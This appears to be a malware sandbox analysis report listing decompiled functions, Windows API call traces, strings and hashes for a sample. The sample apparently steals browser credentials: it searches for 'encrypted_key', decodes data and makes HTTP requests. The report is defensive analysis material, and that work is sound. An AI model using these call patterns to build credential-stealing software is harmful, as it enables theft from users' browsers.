Instruction Fuzzy Hash: 12212371600514EBCB109F29DC88A9A3779EF8636DF105214FD2C87B82DB719C078FAA

Function 6C5DC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C5DC5A3
WideCharToMultiByte.KERNEL32 ref: 6C5DC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C5DC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5DCA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5DCA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5DCAA5

Strings

0, xrefs: 6C5DD30A
(null), xrefs: 6C5DC596

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: ac01efbfdfc1f38521d590aaa732f52856cb0f9e5ca987fb87e47c1fd194e228
Instruction ID: d82b1e9be0c075298d36c37dcc8dc7c572e27e18b1ca85c02b05074fa71936fd
Opcode Fuzzy Hash: ac01efbfdfc1f38521d590aaa732f52856cb0f9e5ca987fb87e47c1fd194e228
Instruction Fuzzy Hash: C7A1BE306083529FDB10DF2DC98475ABBE1AF8A748F06891DE88AD7741D735F805CB9A

Function 002652C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 00256280: InternetOpenA.WININET(00270DFE,00000001,00000000,00000000,00000000), ref: 002562E1
Part of subcall function 00256280: StrCmpCA.SHLWAPI(?,00D4EAC8), ref: 00256303
Part of subcall function 00256280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00256335
Part of subcall function 00256280: HttpOpenRequestA.WININET(00000000,GET,?,00D4DEA0,00000000,00000000,00400100,00000000), ref: 00256385
Part of subcall function 00256280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002563BF
Part of subcall function 00256280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002563D1

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00265318
lstrlen.KERNEL32(00000000), ref: 0026532F

Part of subcall function 00268E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00268E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00265364
lstrlen.KERNEL32(00000000), ref: 00265383
lstrlen.KERNEL32(00000000), ref: 002653AE

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Strings

ERROR, xrefs: 0026546F
ERROR, xrefs: 00265432
ERROR, xrefs: 002653B9
ERROR, xrefs: 0026530A
ERROR, xrefs: 002654A9

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 92f27d1f7d71a9ea0e7780d9609a6111e3d5b7039412c04b9bdb2e6da27ab131
Instruction ID: dea92b57faf9a4fb8b9bc90557715c9688a9045db835a0bf26fe8299e8523da8
Opcode Fuzzy Hash: 92f27d1f7d71a9ea0e7780d9609a6111e3d5b7039412c04b9bdb2e6da27ab131
Instruction Fuzzy Hash: 7451CB709301489BDB14FF64CD96AED7779AF10301F504128F80A6B591EF346BA5CFA2

Function 6C5B3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5B3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5B34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5B34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C5B350E
__Init_thread_footer.LIBCMT ref: 6C5B3522
__aulldiv.LIBCMT ref: 6C5B3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5B357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5B3592

Part of subcall function 6C5EAB89: EnterCriticalSection.KERNEL32(6C63E370,?,?,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284), ref: 6C5EAB94
Part of subcall function 6C5EAB89: LeaveCriticalSection.KERNEL32(6C63E370,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5EABD1

Strings

kernel32.dll, xrefs: 6C5B34EA
GetSystemTimePreciseAsFileTime, xrefs: 6C5B3508

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: c850ba1f41ab8fa59035c983c9a5d74c1770375d4a5d4d70497a5ebd085a8cd9
Instruction ID: 1899258d164b3df1791eb476833dc6cc3c8a376a202f5924b223378afb2a6071
Opcode Fuzzy Hash: c850ba1f41ab8fa59035c983c9a5d74c1770375d4a5d4d70497a5ebd085a8cd9
Instruction Fuzzy Hash: 3E31D571F002059BDF10DFBACD98EAA7BB5FB86304F101419E509B3690DB709905CF65

Function 6C5B4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C5F4843,?), ref: 6C5B45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C5F4843,?), ref: 6C5B468A
free.MOZGLUE(?,?,?,?,?,?,6C5F4843,?), ref: 6C5B46C9
free.MOZGLUE(?), ref: 6C5B46EF
free.MOZGLUE(?), ref: 6C5B4712
free.MOZGLUE(?), ref: 6C5B4735
free.MOZGLUE(?), ref: 6C5B4758
free.MOZGLUE(?), ref: 6C5B477B
free.MOZGLUE(?), ref: 6C5B479E

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: a9f7a7104caae56d894bd963877b1c8f6d7964ed57469059808fa3e07ecd2885
Instruction ID: cf87476da91a3469231ce7fc0848753c120b83fe41eb562f8c918890b1e11997
Opcode Fuzzy Hash: a9f7a7104caae56d894bd963877b1c8f6d7964ed57469059808fa3e07ecd2885
Instruction Fuzzy Hash: 36B1D471A005518FDB28DF6CDCB476D7BA2AF81328F184669E416EBB96E7309840CB91

Function 002612D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 3daa0c99cff6859559c175b5f716c66a883df84d11f792186903ee492e206ad1
Instruction ID: f7f171699db3f023762c1577a6c6fb9b966ba40f318491170c5261c76c780790
Opcode Fuzzy Hash: 3daa0c99cff6859559c175b5f716c66a883df84d11f792186903ee492e206ad1
Instruction Fuzzy Hash: 7FC195B59102199BCB14EF60DC89FEA7378BB64304F1045A9E50AA7281DF70AEE5CF91

Function 00264280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00268DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

lstrcat.KERNEL32(?,00000000), ref: 002642EC
lstrcat.KERNEL32(?,00D4E4E8), ref: 0026430B
lstrcat.KERNEL32(?,?), ref: 0026431F
lstrcat.KERNEL32(?,00D4CEB8), ref: 00264333

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 00268D90: GetFileAttributesA.KERNEL32(00000000,?,00251B54,?,?,0027564C,?,?,00270E1F), ref: 00268D9F

Part of subcall function 00259CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00259D39

Part of subcall function 002599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002599EC
Part of subcall function 002599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00259A11
Part of subcall function 002599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00259A31
Part of subcall function 002599C0: ReadFile.KERNEL32(000000FF,?,00000000,0025148F,00000000), ref: 00259A5A
Part of subcall function 002599C0: LocalFree.KERNEL32(0025148F), ref: 00259A90
Part of subcall function 002599C0: CloseHandle.KERNEL32(000000FF), ref: 00259A9A

Part of subcall function 002693C0: GlobalAlloc.KERNEL32(00000000,002643DD,002643DD), ref: 002693D3

StrStrA.SHLWAPI(?,00D4E5F0), ref: 002643F3
GlobalFree.KERNEL32(?), ref: 00264512

Part of subcall function 00259AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N%,00000000,00000000), ref: 00259AEF
Part of subcall function 00259AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00254EEE,00000000,?), ref: 00259B01
Part of subcall function 00259AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N%,00000000,00000000), ref: 00259B2A
Part of subcall function 00259AC0: LocalFree.KERNEL32(?,?,?,?,00254EEE,00000000,?), ref: 00259B3F

lstrcat.KERNEL32(?,00000000), ref: 002644A3
StrCmpCA.SHLWAPI(?,002708D1), ref: 002644C0
lstrcat.KERNEL32(00000000,00000000), ref: 002644D2
lstrcat.KERNEL32(00000000,?), ref: 002644E5
lstrcat.KERNEL32(00000000,00270FB8), ref: 002644F4

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: f465b7171da54f15bae3c831d9d5e97461da6be997487d6f96a6341ada56329e
Instruction ID: ba3decc7664104921b44d19ea2a6851d51083872d9d9762718417ed4df767561
Opcode Fuzzy Hash: f465b7171da54f15bae3c831d9d5e97461da6be997487d6f96a6341ada56329e
Instruction Fuzzy Hash: 35715B76920208ABDF14FBB0DC85FEE7379AB98300F044599F50597181EA34DBA9CF95

Function 6C61AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C61AC52
CreateFileMappingW.KERNEL32 ref: 6C61AC7D
GetSystemInfo.KERNEL32 ref: 6C61AC98
MapViewOfFile.KERNEL32 ref: 6C61ACB0
GetSystemInfo.KERNEL32 ref: 6C61ACCD
MapViewOfFile.KERNEL32 ref: 6C61AD05
UnmapViewOfFile.KERNEL32 ref: 6C61AD1C
CloseHandle.KERNEL32 ref: 6C61AD28
UnmapViewOfFile.KERNEL32 ref: 6C61AD37
CloseHandle.KERNEL32 ref: 6C61AD43
CloseHandle.KERNEL32 ref: 6C61AD67

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: d559c0de6694c9361b16b6c03423bbd62c77ef8972fe14c894c2ed8e1c90541b
Instruction ID: 7ac050c46219762999f2442ceff9b7c3834973d527f16f959959a6eff1cb5501
Opcode Fuzzy Hash: d559c0de6694c9361b16b6c03423bbd62c77ef8972fe14c894c2ed8e1c90541b
Instruction Fuzzy Hash: B23162B1908B448FDB00AF7ED68826EBBF0BFC5305F01592DE98987251EB749449CB86

Function 6C609D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C608273), ref: 6C609D65
free.MOZGLUE(6C608273,?), ref: 6C609D7C
free.MOZGLUE(?,?), ref: 6C609D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C609E0F
free.MOZGLUE(6C60946B,?,?), ref: 6C609E24
free.MOZGLUE(?,?,?), ref: 6C609E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C609EC8
free.MOZGLUE(6C60946B,?,?,?), ref: 6C609EDF
free.MOZGLUE(?,?,?,?), ref: 6C609EF5

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: d57acd6cd2a1ae588f034f6df84d426ec7f7f853a5e167111d2f8c577b2e301e
Instruction ID: 17626e5bb85b914a5824967c4534e0aac02e6e898cceceac076153bcabc98f0a
Opcode Fuzzy Hash: d57acd6cd2a1ae588f034f6df84d426ec7f7f853a5e167111d2f8c577b2e301e
Instruction Fuzzy Hash: FC71ACB0A09B41CBD716CF18C98055AF3F5FF99319B408659E88A6BB01EB30FC85CB85

Function 6C60DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C60DDCF

Part of subcall function 6C5EFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5EFA4B

Part of subcall function 6C6090E0: free.MOZGLUE(?,00000000,?,?,6C60DEDB), ref: 6C6090FF
Part of subcall function 6C6090E0: free.MOZGLUE(?,00000000,?,?,6C60DEDB), ref: 6C609108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C60DE0D
free.MOZGLUE(00000000), ref: 6C60DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C60DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C60DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C60DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C5FDEFD,?,6C5C4A68), ref: 6C60DF32

Part of subcall function 6C60DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C60DB86
Part of subcall function 6C60DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C60DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C5FDEFD,?,6C5C4A68), ref: 6C60DF65
free.MOZGLUE(?), ref: 6C60DF80

Part of subcall function 6C5D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5D5EDB
Part of subcall function 6C5D5E90: memset.VCRUNTIME140(ewal,000000E5,?), ref: 6C5D5F27
Part of subcall function 6C5D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5D5FB2

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: df8131335dbbf947bdb5f9bccb82af98f7bbd6bbc35177caa369e2f532094ca8
Instruction ID: 1669922293a7e8cd8f2cb28c3031a70aeb2ad91fce3f5326666d63a01465e7e6
Opcode Fuzzy Hash: df8131335dbbf947bdb5f9bccb82af98f7bbd6bbc35177caa369e2f532094ca8
Instruction Fuzzy Hash: 1451C7767017119BD7299B18CA806AEB372BFD1348F96421CD51A73B00D731F81ACB8A

Function 6C615D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615DC9
std::_Facet_Register.LIBCPMT ref: 6C615DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C615C8C,?,6C5EE829), ref: 6C615E45

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

